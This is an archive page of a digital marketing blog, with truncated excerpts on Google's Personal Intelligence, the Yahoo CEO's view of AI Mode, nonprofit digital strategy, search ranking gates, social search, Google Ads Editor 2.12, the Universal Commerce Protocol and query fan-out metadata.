Author name: aftabkhannewemail@gmail.com

Uncategorized

Google expands Personal Intelligence to AI Mode, Gemini, Chrome

In a significant move that signals the next era of search and digital assistance, Google has officially begun expanding its “Personal Intelligence” features across its most vital consumer platforms. Previously limited to a select group of beta testers and high-tier subscribers, these advanced AI capabilities are now rolling out to AI Mode in Google Search, the Gemini mobile app, and the Google Chrome browser for users across the United States. This expansion marks a fundamental shift in how Google interacts with its users. By bridging the gap between general web information and a user’s private data—such as emails, calendar events, and photo libraries—Google is moving away from being a mere search engine and toward becoming a true “proactive assistant.” For the tech industry and the digital marketing landscape, this represents a pivot toward hyper-personalization that could redefine the user experience for years to come. What is Google Personal Intelligence? At its core, Personal Intelligence is a framework that allows Google’s generative AI models to access and synthesize information from a user’s personal ecosystem. While standard AI models like Gemini are trained on massive datasets of public information, Personal Intelligence allows the AI to “know” the user. It draws context from first-party data stored within Google’s own suite of applications, including Gmail, Google Drive, and Google Photos. The goal is to provide answers that are not just factually correct, but contextually relevant to the individual. Instead of searching for “how to fix a dishwasher,” a user might ask, “How do I fix my dishwasher?” and the AI will look through Gmail for a digital receipt or a manual to identify the exact model number and provide specific instructions. This feature was initially introduced as a U.S.-only beta in January 2024, exclusively for users with Gemini Advanced subscriptions (those on the AI Premium plan using Pro and Ultra models). The current expansion brings these capabilities to the broader public, including those using the free version of Gemini and those utilizing the new AI Mode in standard Google Search. Integration Across AI Mode, Gemini, and Chrome The rollout is occurring simultaneously across three primary touchpoints, ensuring that users can access their personalized AI assistant regardless of how they choose to interact with the web. AI Mode in Google Search AI Mode represents the latest evolution of the search experience. Unlike the traditional list of blue links or even the AI Overviews that summarize web content, AI Mode is designed for deep, conversational queries. With the addition of Personal Intelligence, U.S. users can now ask Search to perform tasks that involve their own data. This feature is currently active and represents a major step in Google’s attempt to modernize its core product. The Gemini App For mobile users, the Gemini app is the primary hub for these features. While the Personal Intelligence features were previously locked behind a paywall, Google is now rolling them out to free users. This means millions of additional people will soon be able to ask Gemini to summarize emails, find specific photos based on descriptions, or check their flight status directly within the chat interface. Gemini in Chrome Google is also integrating these capabilities directly into the Chrome browser. This allows for a more seamless workflow where users can invoke Gemini while browsing other websites. By having access to Personal Intelligence in the browser, Gemini can help users fill out forms, cross-reference information on a website with their personal notes, or manage their schedule without ever leaving the current tab. Real-World Applications: How Personal Intelligence Works The true value of Personal Intelligence lies in its ability to handle complex, multi-step queries that would normally require a user to jump between several different apps. Google has highlighted several key use cases that demonstrate the power of this integration: 1. Hyper-Personalized Shopping Shopping becomes significantly more efficient when the AI understands your preferences. If you ask for a recommendation for a new pair of running shoes, Personal Intelligence can look at your past purchase history in Gmail to identify brands you prefer, sizes you wear, and even the frequency with which you replace your gear. It can then filter search results to prioritize the brands you trust and the stores where you have loyalty accounts. 2. Technical Troubleshooting One of the most frustrating aspects of modern life is finding the right support for a specific device. Instead of digging through a junk drawer for a paper manual, users can rely on Gemini to find the exact receipt or confirmation email for a tech purchase. The AI can identify the model, check warranty status, and provide troubleshooting steps tailored specifically to that hardware. 3. Travel and Itinerary Management Travel planning is a logistics-heavy task that Google is uniquely positioned to solve. By connecting to Gmail and Google Calendar, the AI can see upcoming flight details, hotel reservations, and car rentals. Users can ask, “What’s my schedule for my Chicago trip next week?” and receive a comprehensive itinerary that combines their bookings with local weather forecasts and restaurant recommendations based on past dining preferences. 4. Hobby and Interest Cultivation Google’s AI can also infer interests based on a user’s YouTube history and search patterns. If a user has been watching a lot of woodworking videos, Personal Intelligence might suggest local workshops or notify the user when a specific tool they’ve been researching goes on sale. It transforms the AI from a reactive tool into a proactive hobbyist companion. Privacy, Consent, and Data Security Whenever a tech giant expands its access to personal data, privacy concerns inevitably arise. Google has been proactive in addressing these issues, emphasizing that Personal Intelligence is built on a foundation of user control and transparency. Key privacy safeguards include: Opt-in Only: These features are not turned on by default. Users must explicitly choose to connect their Gmail, Photos, and other apps to the Gemini ecosystem. Granular Control: Connections are not all-or-nothing. A user can choose to let the AI see their emails but block access to their Google

Uncategorized

Yahoo CEO: Google AI Mode is the biggest threat to web traffic

The digital landscape is currently undergoing its most significant transformation since the invention of the search engine itself. As artificial intelligence becomes deeply integrated into the way we find information online, the foundational “search-to-click” model that has sustained the open web for decades is facing an existential crisis. In a recent and candid discussion on The Verge’s “Decoder” podcast, Yahoo CEO Jim Lanzone addressed these concerns, labeling Google’s AI Mode as the single greatest threat to web traffic today. His insights provide a stark warning for publishers while outlining a different path forward for one of the internet’s legacy giants. The Erosion of the Open Web’s Core Traffic Model For nearly thirty years, the relationship between search engines and publishers has been symbiotic. Publishers create high-quality content—news, guides, reviews, and data—and search engines provide the discovery mechanism that drives traffic back to those creators. This traffic, in turn, fuels the advertising and subscription revenue that allows publishers to keep producing content. However, the advent of Large Language Models (LLMs) and generative AI search features is rapidly dismantling this cycle. Lanzone specifically pointed to Google’s AI Mode—often referred to as AI Overviews or Search Generative Experience (SGE)—as the primary disruptor. By providing comprehensive, AI-generated answers directly on the search results page, these “answer engines” often remove the need for a user to click through to the source website. When a user gets their answer without leaving the search page, the publisher loses the opportunity to monetize that visit, yet their content was likely used to train the very AI that replaced them. Lanzone noted that LLMs are a significant reason why the open web is under threat. He argued that publishers deserve the traffic they have traditionally earned. Without a healthy publishing ecosystem, the cycle of information breaks down. If publishers cannot afford to create new content because their traffic has been siphoned off by AI summaries, the LLMs will eventually run out of fresh, high-quality data to consume, leading to a degradation in the quality of AI answers for everyone. Yahoo Scout: A Different Philosophy on AI Search While competitors are leaning heavily into chatbot-style interfaces that mimic human conversation, Yahoo is taking a more conservative and publisher-friendly approach. Lanzone introduced “Scout,” Yahoo’s answer engine, which is designed to enhance the search experience without cutting off the lifeline to content creators. Unlike ChatGPT or Google’s more conversational experiments, Scout is built to feel like a natural evolution of traditional search rather than a replacement for it. Yahoo’s approach with Scout is purposely paragraph-driven and link-heavy. The goal is not to act as a “friend” or a personal chatbot, but to serve as a high-utility interface that explicitly highlights and links back to the original sources. Lanzone emphasized that Yahoo has “bent over backwards” to ensure that traffic is sent downstream to the people who actually created the content. By maintaining this clear distinction between an AI-generated summary and the source material, Yahoo aims to preserve the value of the publisher’s work. This strategy also defines Yahoo’s position in the AI market. They are not attempting to build a general-purpose LLM that competes with OpenAI or Google in areas like coding or creative writing. Instead, they are focusing on “answer engines” that facilitate information retrieval while respecting the ecosystem that provides that information. The “Big Bad Wolf” and the Dangers of AI Intermediaries In one of the more poignant moments of the interview, Lanzone issued a warning to publishers and tech companies about the dangers of becoming overly reliant on AI platforms as intermediaries. He used a historical analogy, drawing from Yahoo’s own past, to illustrate the risk of letting a larger platform sit between a brand and its audience. In the early 2000s, Yahoo famously outsourced its search technology to Google, effectively giving a smaller competitor the keys to its kingdom. This move allowed Google to refine its algorithms using Yahoo’s massive user data, eventually leading to Google’s total dominance in search and the decline of Yahoo’s market share. Lanzone sees a similar pattern emerging today with LLMs. He warned that by opening up products to be accessed entirely within another company’s large language model, companies are “tempting fate.” The “Big Bad Wolf” metaphor serves as a reminder that while AI partnerships may seem beneficial and convenient today, they can lead to a loss of brand identity and direct user relationships in the long run. If a publisher’s content is only consumed through an AI’s voice, the publisher becomes an invisible commodity, easily replaced or sidelined by the platform owner. Personalization and Agentic Actions: The Next Frontier for Yahoo While Yahoo is cautious about the “chatbot” model, they are not shying away from AI innovation. Lanzone revealed that Yahoo is currently embedding AI across its entire ecosystem to improve utility and user experience. This includes major updates to Yahoo Finance and Yahoo Mail, two of the platform’s most robust pillars. In Yahoo Finance, AI is being used to provide on-the-fly analysis of stocks, summarizing complex financial data into actionable insights for investors. In Yahoo Mail, AI tools help users summarize long email threads and process messages more efficiently. This type of utility-based AI focuses on helping users accomplish specific tasks rather than just providing “answers.” Looking ahead, Lanzone discussed the transition into “agentic actions.” This represents a shift from AI that simply talks to AI that actually “does.” Agentic AI can take actions on behalf of the user—organizing schedules, making purchases, or managing workflows. By focusing on personalization and task completion, Yahoo hopes to increase the frequency with which its 700 million global users engage with the platform. Yahoo’s Market Position and Strategy It is no secret that Google dominates the search market share, but Lanzone clarified that Yahoo isn’t necessarily trying to “beat” Google at its own game. Yahoo’s search volume comes primarily from its existing, massive network. With 250 million users in the United States and 700 million globally, Yahoo remains a top-tier internet destination. The strategy

Uncategorized

How nonprofits can build a digital presence that actually drives impact

How nonprofits can build a digital presence that actually drives impact For a long time, a nonprofit’s digital presence has been viewed as a peripheral necessity—a digital brochure that exists because “everyone else has one.” However, in the modern landscape of philanthropy and social advocacy, a digital presence is no longer a “nice-to-have” secondary asset. It is the central hub for mission delivery, donor engagement, and community advocacy. Whether you are a small local charity or a global NGO, your online footprint is often the first, and sometimes the only, point of contact for your supporters. Many organizations struggle with the technical and strategic foundations needed to turn a basic website and a handful of social media accounts into a high-performing digital ecosystem. The challenge often lies in a lack of resources or technical expertise, leading to a fragmented strategy that fails to convert interest into action. The goal of a digital strategy isn’t simply to “be online.” It is to build reliable, scalable infrastructure so your organization owns its narrative, protects its assets, and accurately measures the impact of every digital effort. To move from a passive online existence to a dynamic digital presence that drives real-world impact, nonprofits must approach their digital strategy with the same rigor they apply to their programmatic work. This requires getting the “digital house” in order, starting with the technical foundations and moving toward a sophisticated, data-driven engagement model. 1. Own your foundations: Domains and account control Owning your name and your story is an essential part of a proactive online reputation management strategy. In the digital realm, this translates to absolute control over your technical assets. One of the most overlooked risks in nonprofit management is the lack of direct ownership over the very tools that allow the organization to communicate with the world. In many cases, a well-meaning volunteer, a board member’s relative, or a third-party agency registers a domain name or creates social media accounts using their personal email credentials. While this may seem convenient during the initial setup, it creates a massive vulnerability. If that individual leaves the organization on bad terms, moves away, or simply becomes unreachable, the nonprofit risks losing access to its primary digital channels. Losing a domain name can be catastrophic, leading to a complete loss of SEO authority, broken links in past communications, and the need to rebuild a brand from scratch. Best practices for technical ownership To avoid these pitfalls, nonprofits must implement strict governance over their digital assets: Domain ownership: Ensure that your domain is registered in the organization’s legal name. Always use a generic, organization-controlled email address—such as “admin@yournonprofit.org” or “info@yournonprofit.org”—rather than a personal one. This ensures that even if staffing changes occur, the organization retains access to the registrar account. Additionally, enable auto-renewal and select a registrar that offers multi-factor authentication and robust security features to prevent unauthorized transfers. Website hosting and management: Similar to domain registration, the organization should hold the primary account for website hosting. If an agency manages your site, ensure you have “Owner” or “Super Admin” level access to the hosting control panel and the Content Management System (CMS). You should never be in a position where you have to “ask permission” to access your own data or site files. Social media governance: Establish ownership of key social media channels using the same generic email strategy. Most platforms, such as Facebook (via Meta Business Suite) and LinkedIn, allow you to grant access to individuals via delegation. Never share a single password among multiple people. Instead, assign roles (Editor, Admin, Advertiser) to individual personal accounts. This allows you to revoke access immediately when someone moves on, protecting the brand’s voice and security without compromising the account itself. 2. Move beyond ‘winging it’: The editorial calendar A common mistake for nonprofits is the “broadcast-only” approach to content. This happens when an organization only posts when there is an immediate, often desperate, need—such as an emergency fundraising appeal or a call for volunteers. When a nonprofit’s feed consists of nothing but “asks,” it leads to donor fatigue and a steady decline in engagement. Supporters want to see the results of their contributions, not just requests for more. To build a thriving digital community, you need a content plan that balances stories of impact with actionable requests. This requires moving away from “winging it” and toward a structured editorial calendar. The 70/20/10 rule for content A balanced content strategy ensures that you are providing value to your audience before asking them to provide value to you. A helpful framework is the 70/20/10 rule: 70% Value-Based Content: The majority of your content should focus on impact stories, educational information, and “behind-the-scenes” looks at your work. Show the faces of the people you help, share the statistics of your success, and position your organization as a thought leader in your specific cause. 20% Shared Content: Nonprofits exist within an ecosystem. Share relevant news, articles, or posts from partners, community members, or other experts in your field. This builds goodwill and shows that you are part of a larger movement. 10% Direct Asks: This is where you make your pitch. Whether it is a donation request, a volunteer signup, or an invitation to an event, your “asks” will be much more effective because you have spent the other 90% of your time building trust and demonstrating value. Implementing an editorial calendar An editorial calendar doesn’t need to be complex. It can be as simple as a shared spreadsheet or a dedicated project management tool. The goal is to map out themes and specific pieces of content at least a month in advance. This bird’s-eye view ensures that your messaging remains consistent across email, social media, and your blog. It also prevents the “Giving Tuesday” scramble, allowing your team to produce high-quality assets like videos and graphics well before they are needed. 3. Tracking what matters (and ignoring what doesn’t) Data is the lifeblood of digital growth, but only if it informs future

Uncategorized

5 competitive gates hidden inside ‘rank and display’

The digital marketing landscape is currently undergoing a foundational shift. For years, content strategists and SEO professionals have operated under a simplified model often referred to as “rank and display.” In this traditional view, you create content, search engines index it, and if your signals are strong enough, you rank. However, as artificial intelligence and assistive engines take center stage, this two-step compression is no longer sufficient to describe how information is actually surfaced to users. If you are a content strategist, you might feel that the deep technical infrastructure of search engines is outside your territory. In reality, everything you build feeds into a sophisticated five-gate competitive system. The decisions made by algorithms at these gates determine whether the system recruits your content, trusts it enough to display it, and ultimately recommends it to a potential customer. To succeed in this new era, we must move beyond “rank and display” and understand the ARGDW competitive phase. The competitive turn: Where absolute tests become relative ones To understand the competitive phase, we first have to look at what precedes it. The initial stage of content discovery is the DSCRI infrastructure phase, which covers discovery, crawling, rendering, and indexing. These are absolute tests. Either the system has your content, or it doesn’t. If your site fails to render correctly or cannot be crawled, it never enters the race. The transition from indexing to the next stage is what we call the “competitive turn.” This is the most significant moment in the content pipeline. Once a page is indexed, the system stops asking “Do I have this?” and starts asking “Is this better than the alternatives?” Every gate from this point forward is a relative test. It is a Darwinian environment of “survival of the fittest.” Your content doesn’t just need to be technically sound; it needs to beat the alternatives in terms of confidence, clarity, and relevance. A page that is perfectly indexed but poorly understood by the algorithm will lose to a competitor whose content the system understands with greater certainty. The infrastructure phase provides the raw material; the competitive phase determines if that material is worthy of the user’s attention. Multi-graph presence as a structural advantage in ARGDW The modern “algorithmic trinity”—consisting of search engines, knowledge graphs, and Large Language Models (LLMs)—operates across the competitive gates of annotation, recruitment, grounding, and display. To win, a brand must establish a presence across three distinct knowledge structures: the document graph, the entity graph, and the concept graph. This is where “single-graph thinking” becomes a major liability. Traditional SEO focuses almost exclusively on the document graph—ranking pages based on keywords and links. However, an entity that exists in the entity graph with confirmed attributes (like a robust Knowledge Panel or structured data) receives a significantly higher confidence score. If the system can verify your claims against structured facts in an entity graph, it trusts your document graph content more. Furthermore, the concept graph handles association patterns and expertise. Brands that invest in consistent, well-structured copywriting across authoritative platforms optimize for this third graph. When a brand is present in all three, it creates a compounding advantage. The system can cross-reference information, reducing “fuzziness” and ambiguity, which allows your content to pass through competitive gates that stop your competitors in their tracks. Annotation: The gate that decides what your content means Annotation is perhaps the most overlooked gate in the entire pipeline, yet it acts as the hinge between infrastructure and competition. As Fabrice Canel of Microsoft Bing noted, the system must provide “richness on top of HTML” by extracting features and providing annotations that other teams (like the ranking or display teams) can use. Annotation is where the system reads what it has stored and decides what it actually means. This classification process is incredibly complex, operating across at least five categories and more than 24 dimensions. The system uses specialist models to score your content before it ever considers ranking it. If the annotation is inaccurate, your content is essentially filed in the wrong drawer, making it invisible to the relevant queries. The Gatekeepers These models determine if your content is even eligible for specific competitive pools. They look at temporal scope (is the information current?), geographic scope (where is this relevant?), and language. They also handle entity resolution—ensuring the “Jason Barnard” mentioned on the page is the correct “Jason Barnard” and not someone else with the same name. Fail here, and you are excluded regardless of your content’s quality. Core Identity and Selection Filters Core identity models classify the substance of the content, identifying entities, attributes, and relationships. Selection filters then add query routing, determining the intent category (informational vs. transactional) and the expertise level. If your content is classified as informational but the user has transactional intent, the selection filter will route the user away from your page. Extraction Quality and Confidence Multipliers Extraction quality scores look at “standalone” potential. Can a chunk of your content be extracted and still make sense to a user? If your content relies too heavily on surrounding context that the AI can’t easily parse, it receives a lower score. Finally, confidence multipliers determine how much the system trusts its own classification. This involves verifiability, provenance, and how well your claims align with the established consensus. Confidence: The single most important factor in SEO and AAO For years, the industry mantra was “content is king.” Later, “context” became the focus. Today, the real king is confidence. Assistive engines and search platforms have a primary goal: to retain users by providing helpful, accurate results. If an engine has high-quality content that seems relevant but has low confidence in its accuracy, it will likely pass over that content to avoid providing a poor or misleading user experience. Confidence is a multiplier. It determines whether the system has the “courage” to use your content in a featured snippet, an AI summary, or a direct recommendation. High confidence is built through corroboration across different graphs and the

Uncategorized

Why social search visibility is the next evolution of discoverability

Why social search visibility is the next evolution of discoverability For more than two decades, the roadmap for digital marketing was remarkably straightforward: if you wanted to be found, you had to rank on Google. Search Engine Optimization (SEO) was a discipline built almost entirely around the mechanics of a single algorithm. We obsessed over keywords, backlink profiles, and technical site health, all in an effort to capture a slice of the massive demand flowing through Google’s search results. For a long time, this was the only game in town. However, the walls of the “Google-only” garden are beginning to crumble. We are currently witnessing a fundamental shift in how human beings navigate the digital world. Search behavior is no longer confined to a single white box on a minimalist landing page. Instead, it has fractured and dispersed across an entire ecosystem of platforms, each serving a distinct psychological need. This shift represents the next great evolution of discoverability, moving us from a world of “Search Engines” to a world of “Search Everywhere.” Today, when a consumer wants to know how to fix a leaky faucet, they go to YouTube. When they want to find a trendy restaurant in a new city, they open TikTok. When they want an unvarnished, honest opinion on a new laptop, they append “Reddit” to their query or search the forum directly. When they want to buy a product, they start on Amazon. This diversification of search behavior is perhaps the most significant—and most overlooked—opportunity in modern digital marketing. Understanding the Diversification of Search Behavior The traditional search strategy was built on the assumption that Google was the universal starting point for every digital journey. Recent data, however, tells a much more nuanced story. Research conducted by SparkToro and Datos analyzed search behavior across 41 major platforms, including traditional search engines, e-commerce giants, social networks, and emerging AI tools. The findings confirm that while Google remains a titan, the “search universe” is expanding rapidly. According to the research, search activity is roughly distributed as follows: Traditional Search Engines: These still command approximately 80% of all search activity, with Google alone holding a dominant 73.7% share. Commerce Platforms (Amazon, Walmart, eBay): These account for roughly 10% of search volume, representing high-intent users ready to convert. Social Networks: Platforms like TikTok, Instagram, and Reddit capture about 5.5% of search activity. AI Tools (ChatGPT, Claude, Perplexity): Despite the massive hype, these currently account for about 3.2% of search behavior. While 5.5% for social networks might seem small compared to Google’s 73%, it is important to look at the trend line rather than just the snapshot. The percentage of users—particularly Gen Z and Alpha—who prefer social discovery over traditional indexing is growing year over year. Consumers are increasingly searching directly on platforms where they expect to find the most useful answers in the formats they prefer, rather than relying on a middleman to send them to a third-party website. The AI Distraction vs. The Social Reality If you spend any time reading tech news or marketing blogs, you would think that AI search is the only thing that matters in 2024 and 2025. The industry is currently obsessed with questions like “How do I rank in ChatGPT?” or “Will Perplexity kill Google?” While these are valid questions for the long term, they often distract marketers from the massive shifts happening right now in the mainstream. The SparkToro data highlights a grounding reality: AI search tools currently account for only 3.2% of search activity. This is meaningful, and AI will undoubtedly reshape how we interact with information, but it is currently a smaller slice of the pie than established discovery platforms. For context, Amazon receives more searches than ChatGPT. YouTube receives more searches than ChatGPT. Even Bing, often the underdog of the search world, sees more search activity than the current crop of AI chatbots. Many brands are pouring a disproportionate amount of resources into “AI Optimization” while completely ignoring platforms where millions of high-intent searches are already happening every single day. The real opportunity for the next 12 to 18 months isn’t just in the LLMs (Large Language Models); it’s in the social search engines that have already achieved broad, mainstream adoption. Social Platforms as the New Search Engines The definition of a “search engine” has expanded. It is no longer just a crawler that indexes web pages; it is any platform that allows a user to input an intent and receive a curated set of results. For a huge demographic of users, social platforms have become their primary search destinations. Each platform plays a unique role in the consumer’s discovery journey. TikTok and Instagram: The Hub of Recommendations TikTok has become the search engine of choice for lifestyle, travel, and product recommendations. Its algorithm is uniquely suited to “discovery search”—finding things you didn’t know you were looking for, or finding the “vibe” of a place through short-form video. Users search for things like “best affordable skincare” or “hidden gems in Tokyo” because they want to see the proof, not just read a meta-description. YouTube: The Global Tutorial Library YouTube is technically the second largest search engine in the world. It is the destination for tutorials, long-form reviews, and deep-dive problem-solving. If a user needs to see how a product works or learn a complex skill, they go to YouTube first. Search intent on YouTube is often educational or evaluative, making it a critical touchpoint for brands in the “consideration” phase of the funnel. Reddit: The Trust Layer of the Internet In an era of AI-generated content and SEO-optimized affiliate blogs, Reddit has become the “trust layer.” Users search Reddit (or use Google to find Reddit threads) because they want human opinions, unfiltered discussions, and community-vetted advice. If someone is looking for the “best gaming mouse,” they don’t want a listicle; they want to see what 500 enthusiasts on r/MouseReview think. Pinterest: Visual Planning and Inspiration Pinterest is often miscategorized as a social network, but it functions much

Uncategorized

Google Ads Editor 2.12 adds creative control and campaign flexibility

Digital marketing is currently undergoing a massive paradigm shift, moving away from manual keyword bidding and toward AI-orchestrated campaign management. For power users, the desktop-based Google Ads Editor remains the gold standard for managing complex accounts at scale. The latest update, Google Ads Editor 2.12, represents a significant step forward in this evolution. It focuses on giving advertisers more creative control and campaign flexibility while leaning into the automated nature of Performance Max and Demand Gen campaigns. As Google continues to integrate sophisticated machine learning into its advertising ecosystem, version 2.12 introduces a suite of features designed to help marketers guide AI more effectively. This update isn’t just about technical tweaks; it is about providing the guardrails and creative variety necessary to excel in a mobile-first, video-centric landscape. Enhanced Creative Power in Performance Max Performance Max (PMax) has become the centerpiece of many digital marketing strategies. However, one of the primary criticisms from veteran PPC managers has been the perceived “black box” nature of its creative distribution. Google Ads Editor 2.12 addresses this by significantly expanding the creative limits within PMax asset groups. Expanding Video Capacity One of the most notable changes in version 2.12 is the ability to include up to 15 videos per asset group in Performance Max campaigns. Previously, the limits were tighter, often forcing advertisers to make difficult choices about which creative variations to test. By allowing 15 videos, Google is encouraging a “more is more” approach to data-driven testing. This expansion allows the Google AI to test a wider variety of hooks, storytelling styles, and calls to action (CTAs). For instance, an e-commerce brand can now upload product-focused demos, testimonial-style clips, high-energy montages, and cinematic brand stories all within the same asset group. This provides the algorithm with a deeper pool of content to match with specific user intents across YouTube, Display, and the Discovery feed. Mobile-First Vertical Image Support The rise of short-form video content on platforms like YouTube Shorts has fundamentally changed how users consume media. To keep pace, Google Ads Editor 2.12 introduces support for 9:16 vertical images. This ensures that assets are naturally optimized for vertical viewing environments, preventing awkward cropping or letterboxing that can diminish brand prestige. By providing dedicated 9:16 assets, advertisers can ensure their visuals occupy the entire screen on mobile devices. This is particularly vital for Performance Max and Demand Gen campaigns, where the goal is to capture attention in high-velocity scrolling environments. Driving Growth with Demand Gen Enhancements Demand Gen campaigns, which replaced Discovery ads, are designed to capture interest on Google’s most visual platforms. Version 2.12 brings several structural updates to Demand Gen that provide better targeting and more refined campaign setups. New Customer Acquisition Goals Focusing on growth often requires prioritizing new shoppers over returning ones. Google Ads Editor 2.12 now supports “New Customer Acquisition” goals within Demand Gen campaigns. This feature allows advertisers to bid more aggressively for users who have not previously interacted with the brand or to target them exclusively. This is a major win for performance marketers who need to prove that their ad spend is driving incremental growth rather than just recapturing existing traffic. Having this capability within the Editor makes it easier to apply these goals across multiple campaigns or accounts in bulk. Integrating Hotel Feeds The travel industry gets a specific boost in this update with the integration of hotel feeds into Demand Gen campaigns. Advertisers in the hospitality sector can now link their product feeds directly, allowing the AI to dynamically generate ads featuring specific properties, pricing, and availability. This level of automation ensures that ads remain relevant to real-time inventory without requiring constant manual updates. Streamlined Campaign Setup and Minimum Budgets To ensure campaign stability, Google has introduced a new minimum daily budget requirement for Demand Gen. This is designed to prevent “under-funding,” where the AI lacks sufficient data to learn and optimize correctly. Furthermore, the campaign build flow within the Editor has been streamlined, reducing the friction involved in launching complex, asset-heavy campaigns. The Evolution of Video and AI Guardrails As AI-generated assets and automated video formats become more prevalent, Google is introducing tools to help advertisers maintain brand integrity. Google Ads Editor 2.12 adds specific “Brand Guideline” controls and text requirements that ensure AI-generated content remains compliant with a company’s voice and visual identity. Non-Skippable Video Updates For brands focused on awareness and reach, non-skippable video ads are a staple. The 2.12 update improves the management of these formats within the Editor, allowing for better alignment with broader video strategies. Advertisers can now more easily toggle between skippable and non-skippable formats while maintaining a birds-eye view of their bidding strategies. Real-Time Bid Guidance Bidding in an automated world can sometimes feel like a guessing game. Version 2.12 offers improved bid guidance, providing real-time feedback and suggestions based on historical data and current market trends. This helps advertisers set realistic CPA (Cost Per Acquisition) or ROAS (Return On Ad Spend) targets that are ambitious yet achievable. Advanced Budgeting: Total Campaign Budgets Perhaps one of the most practical additions in this release is the “Total Campaign Budget” feature. Historically, Google Ads has focused on daily budgets, where the platform calculates spend over a 30.4-day average. While effective, this can be cumbersome for short-term promotions, seasonal events, or “flash” sales. With Total Campaign Budgets, an advertiser can set a hard cap for a specific date range—for example, $5,000 for a 4-day Black Friday event. Google’s system then automatically paces the delivery to ensure the budget is maximized over that specific window. This eliminates the need for manual daily adjustments and reduces the risk of overspending on the final day of a promotion. Workflow Optimization and Efficiency Tools The core appeal of Google Ads Editor has always been its ability to save time through bulk actions and offline editing. Version 2.12 introduces several “quality of life” improvements that significantly reduce manual labor for account managers. Account-Level Tracking Templates Tracking is the backbone of attribution, but managing

Uncategorized

How Google’s Universal Commerce Protocol could reshape search conversions

How Google’s Universal Commerce Protocol could reshape search conversions The landscape of digital commerce is undergoing its most significant transformation since the invention of the mobile shopping cart. As Google continues to integrate artificial intelligence into the core of its search experience through AI Overviews, Gemini, and AI Mode, the way consumers interact with brands is shifting from a “click-and-browse” model to an “ask-and-action” model. At the heart of this evolution is Google’s Universal Commerce Protocol (UCP). Currently in beta, the Universal Commerce Protocol represents a fundamental shift in how transactions occur on the web. For years, the goal of search engine optimization (SEO) and search engine marketing (SEM) was to drive traffic to a brand’s website where the conversion would hopefully take place. UCP challenges this paradigm by allowing the conversion to happen directly within the AI interface. This “agentic commerce” approach aims to minimize friction, but it also requires a complete rethink of how brands manage their product data and technical infrastructure. What is Google’s Universal Commerce Protocol? At its simplest level, the Universal Commerce Protocol is a standardized framework that allows consumer AI interfaces—like Gemini—to communicate directly with a merchant’s backend checkout system. Think of it as a universal language that allows an AI “agent” to act on behalf of a user to find, vet, and purchase a product without the user ever needing to navigate a traditional website. When a user provides a complex prompt such as, “Find me a pair of carbon-plated running shoes for a marathon, size 11, under $250, with five-star reviews, and buy them using my primary shipping address,” UCP is the invisible bridge. It allows the LLM (Large Language Model) to securely query real-time inventory, apply loyalty points, process payments through the merchant’s gateway, and finalize the order. While the technical documentation refers to advanced concepts like Model Context Protocol (MCP) and Agent2Agent (A2A) interoperability, the practical goal is simple: to turn search results into a seamless, transactional storefront. Crucially, Google is positioning UCP as a merchant-friendly tool. Unlike some third-party marketplaces that “own” the customer and hide the data, UCP is designed so that the brand remains the merchant of record. This means the brand still processes the payment, keeps the customer data, and manages the fulfillment and relationship. The Mechanics of UCP: How It Works in Practice The workflow of a UCP transaction is designed to be as frictionless as possible. It moves through a specific sequence that balances AI convenience with merchant control: The process begins with a conversational query. Because LLMs understand intent and context far better than traditional keyword search, they can filter products based on highly specific criteria. Once a product is identified, UCP facilitates the handshake between the AI and the merchant’s data. This includes checking stock levels and verifying current pricing. Next, the protocol handles the “check-out” logic. Google offers two main paths here: Native Checkout and Embedded Checkout. Native Checkout is the most integrated experience, where the purchase logic is baked directly into the AI interface. Embedded Checkout uses an iframe-based solution, which allows for more bespoke branding but offers a slightly higher friction point than the native option. Regardless of the path, the transaction is executed against the merchant’s existing systems, ensuring that inventory counts and financial records remain accurate and centralized. Mastering Feed Data Hygiene for the AI Era In the world of UCP, your product feed is no longer just a list of items for Google Shopping ads; it is the primary training set and sales manual for Google’s AI agents. If your data is vague, the AI will not recommend your products. To succeed, brands must move beyond basic data entry and embrace high-level feed hygiene. Advanced Product Descriptions and Titles In traditional SEO, we often optimize titles for keywords. In agentic commerce, we optimize for semantic clarity. Google recommends product titles that are at least 30 characters long, providing enough context for an LLM to understand the nuances of the item. Even more critical is the description. While many feeds use short, punchy blurbs, UCP-ready feeds should aim for 500 characters or more. This extra space allows you to detail materials, use cases, compatibility, and specific features that an AI can use to answer specific user questions. The Role of GTINs and Identifiers Accuracy is the currency of AI commerce. Including Global Trade Item Numbers (GTINs) is non-negotiable for brands that want to be featured in UCP transactions. GTINs allow Google to cross-reference your product with a global database, ensuring that when a user asks for a specific brand and model, the AI knows with 100% certainty that your listing is the correct one. Without these identifiers, your products risk being filtered out of conversational results due to a lack of “confidence” from the model. Visual Information as Data AI models are increasingly multi-modal, meaning they “see” images as well as read text. For UCP success, a single product shot on a white background is the bare minimum. Google suggests including at least three additional images. These should include lifestyle shots that show the product in use, which helps the AI understand the context of the item. Furthermore, high-resolution imagery—at least 1,500 by 1,500 pixels—is essential for the visual clarity required in modern AI interfaces. Leveraging Trust and Convenience Signals When a user allows an AI to make a purchase for them, they are delegating trust. To facilitate this, the Universal Commerce Protocol relies heavily on trust and convenience signals embedded within the Merchant Center feed. These signals act as “conversion boosters” that the AI uses to tip the scales in favor of one brand over another. Key attributes that must be prioritized include: Shipping Speed and Cost: Clearly stating “Free Shipping” and providing specific timelines (e.g., “Next-day delivery”) can be the deciding factor when an AI compares two identical products. Return Policies: Transparency regarding returns reduces the perceived risk for the consumer. Having a clear, generous return policy mapped correctly in your feed attributes is

Uncategorized

The Shortcut Behind Some AI Optimization Tools via @sejournal, @DuaneForrester

Understanding the Mechanics of Modern AI Optimization The rapid evolution of generative artificial intelligence has created a secondary market of tools designed to optimize, track, and reverse-engineer how these models think. From SEO professionals trying to understand “Generative Engine Optimization” (GEO) to developers building wrappers around existing Large Language Models (LLMs), the ecosystem is currently in a state of hyper-growth. However, a recent shift in how OpenAI handles its internal query metadata has highlighted a significant vulnerability in the industry: the reliance on unofficial shortcuts. For months, some AI optimization tools relied on a specific technical loophole known as “query fan-out” metadata. This data, which was visible in the background of ChatGPT’s web interface, provided a window into how the model processed complex prompts. When this metadata suddenly disappeared, it didn’t just break a few niche features—it exposed the fundamental fragility of tools built on unofficial access rather than stable, documented APIs. What is Query Fan-Out and Why Does It Matter? To understand why this metadata was so valuable, one must first understand the concept of “query fan-out.” In the context of large language models and search engines, a fan-out occurs when a single, high-level user prompt is decomposed into multiple, more specific sub-queries. For example, if a user asks ChatGPT, “Compare the impact of the industrial revolution in London versus Tokyo,” the model doesn’t just look for one answer. It “fans out” that query into several background searches: one for 